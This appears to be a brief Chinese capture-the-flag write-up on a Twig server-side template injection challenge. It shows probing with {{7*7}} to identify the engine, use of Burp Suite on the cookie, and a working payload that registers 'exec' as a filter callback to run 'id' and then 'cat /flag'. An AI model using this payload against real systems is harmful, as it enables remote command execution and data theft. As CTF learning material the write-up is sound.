好喜欢这个题 可爱可爱
查看hint
在flag页面 进行测试
其中{{7*7}}在Twig中返回49,在Jinja2中返回的是7777777,由此判断出为Twig模版注入
因为提示了cookie,所以使用BurpSuite抓取数据包:
进行测试
详解模板注入漏洞
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
说明是对的
payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};